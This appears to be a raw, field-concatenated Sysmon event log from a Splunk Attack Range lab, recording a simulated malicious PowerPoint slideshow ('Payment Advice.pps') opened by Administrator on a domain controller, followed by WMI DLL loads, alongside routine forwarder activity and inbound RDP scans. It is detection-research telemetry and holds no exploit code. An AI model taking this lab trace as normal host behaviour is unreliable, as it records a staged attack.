Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CA91B5D8A45F69DEFF36BFA33454D08,SHA256=BA406CE39836E350AC5F97F3105ACF99D87CB0C7C7A1323C729451804FE990AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050798Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:30.746{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32DAA17EAF5091D2679132302CD9F1CD,SHA256=C44B0F1ECD4A0001040E7BBC85661EC24F2DA001E1C007379D0917A4C962873D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050797Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:30.183{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA20B60FEDEC9C81E6165738FC6FC251,SHA256=B6795CF39296F6078B02803819A46330DBA585E75794DDCBDAA4EA21046C5E51,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050796Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:27.740{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54209-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050795Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:27.711{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52550-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050794Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:27.094{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56692-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000081953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.840{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBACBDFB7547A1AE12F7ACC6BB2A2BB0,SHA256=9B6E2DB8348A3FC291D8DBF2B4843984BE3D39767194D7C2ACAFA4C6012A59FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.309{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60B3D89646329BEBB6A9F8B3843EC87F,SHA256=E41018A34F5FBBD0B4295B4723A4FA7FCBDC3C2FD0D3C185F9619EF25CE80713,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.137{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923548C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+4c224|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+4dd30|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+584fe|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+57f5f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+56e48|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.137{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923548C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1438C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+73c87|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+7522e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+14519|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+1a430|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+84d6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+638e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3b280|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3af5e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1015b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1a277|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+2185f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+ae38|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+a8fb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x800000000000000081949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.137{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923548C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+2d73e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+16070|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+15184|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+17233|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+1a40c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+84d6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+638e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3b280|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3af5e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1015b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1a277|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+2185f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+ae38|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+a8fb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac 10341000x800000000000000081948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.106{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923548C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+976c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.059{A7A01FEF-B626-607E-1300-00000000BB01}12641420C:\Windows\System32\svchost.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.059{A7A01FEF-B626-607E-1300-00000000BB01}12641420C:\Windows\System32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.059{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.059{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.059{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.059{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.059{A7A01FEF-C0A3-607E-6C05-00000000BB01}36242592C:\Windows\system32\csrss.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.059{A7A01FEF-C0A6-607E-8105-00000000BB01}8366968C:\Windows\Explorer.EXE{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e69f|C:\Windows\System32\windows.storage.dll+16e315|C:\Windows\System32\windows.storage.dll+16de06|C:\Windows\System32\windows.storage.dll+16f278|C:\Windows\System32\windows.storage.dll+16dc2e|C:\Windows\System32\windows.storage.dll+fd025|C:\Windows\System32\windows.storage.dll+fd3a4|C:\Windows\System32\windows.storage.dll+fc9e0|C:\Windows\System32\windows.storage.dll+16650e|C:\Windows\System32\windows.storage.dll+166202|C:\Windows\System32\SHELL32.dll+3f8cd|C:\Windows\System32\SHELL32.dll+3e466|C:\Windows\System32\SHELL32.dll+80201|C:\Windows\System32\SHELL32.dll+6718e|C:\Windows\System32\SHELL32.dll+18d18c|C:\Windows\System32\SHELL32.dll+18cee3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.041{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE16.0.13127.21348Microsoft PowerPointMicrosoft OfficeMicrosoft CorporationPOWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Temp\Payment Advice.pps" /ou ""C:\Temp\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=8360E80A7405C09596EC63B94E801216,SHA256=9AC7BDE91B31367EDDB57629E8D87C3AD87107C520A03AA25735374BC6494FBB,IMPHASH=5DB7D8EEBE8F06F450AAFCA16D7FB09D{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x800000000000000050802Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:31.792{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C561DD75106D0EE42507EB1DD24A8857,SHA256=07EB5A817C39ECDFCD83C3E5ED1C8592522577F2A21480C728AA4A58D8633E2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050801Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:31.683{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=843208EC044923400C7901964F6FC730,SHA256=FB4809B2EE9772119FC200822EDF5DF462C2C38F947D7545B84FB03CC05BF310,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050800Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:28.999{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com57772-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050799Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:28.655{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58165-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000081994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.934{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D0D3C67E64BC87B9D7B555685BBAC7FA,SHA256=72D05FE1B3C28D7C0A573ACE6F2B571EFAF0F68BB8A50F79AE22F67D7B79E180,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.887{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA20AE8269A1C4C4380B9628127C4213,SHA256=71C54925FAA10C952EBEF083EF729E5C6E5EFC22942ADCAD2D377589FE793076,IMPHASH=00000000000000000000000000000000falsetrue 734700x800000000000000081992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.512{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Windows\System32\wbem\fastprox.dll10.0.14393.0 (rs1_release.160715-1616)WMI Custom MarshallerMicrosoft® Windows® Operating SystemMicrosoft Corporationfastprox.dllMD5=C2F7834269D565263C65757EDE37A66C,SHA256=17651A35255229CE95F065CA1BCCC4867B43DA879D72AFCC91FBA4768225C7D3,IMPHASH=481A52B415277FC8692C7D6D9EA3475CtrueMicrosoft WindowsValid 734700x800000000000000081991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.512{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Windows\System32\wbem\wbemsvc.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemsvc.dllMD5=2BE97028B7B85762561F475E31989C2A,SHA256=75C9D8C6D41B4B7D70666A8107A08A748CEF6CB9E60AD0288B10CDE12E274AFF,IMPHASH=200200BEAF933FA4627BF83C67BA473EtrueMicrosoft WindowsValid 734700x800000000000000081990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.496{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Windows\System32\wbemcomn.dll10.0.14393.4283 (rs1_release.210303-1802)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemcomn.dllMD5=EF7A4C64E4A6F52AEAF20828033ADFF8,SHA256=7108BBAE5B91ED6784BD32547F7BD9DEAD392E47ACAB29DC057AEF7CFB746F3C,IMPHASH=3775C2F7CD09C385EEDA8CBB7894E3E3trueMicrosoft WindowsValid 734700x800000000000000081989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.496{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Windows\System32\wbem\wbemprox.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemprox.dllMD5=B7B56FAC395BEEDC20120FD0170A23A3,SHA256=7BDF579D7348D84F251A8411E40E14ADF9406F954914C1C4DE30E880DCF6CEB3,IMPHASH=96416B54C1F2E15EF294753DF1CB4131trueMicrosoft WindowsValid 23542300x800000000000000081988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.746{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D0D3C67E64BC87B9D7B555685BBAC7FA,SHA256=72D05FE1B3C28D7C0A573ACE6F2B571EFAF0F68BB8A50F79AE22F67D7B79E180,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.746{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=783978163844FE69D930CF494E5EFD50,SHA256=30E501490699167C5CC1DDDCA3AFD96F3F1713341F9870063EF7A6730FA1E24E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.746{A7A01FEF-B624-607E-0A00-00000000BB01}8525304C:\Windows\system32\services.exe{A7A01FEF-EC54-607E-6C0F-00000000BB01}1204C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 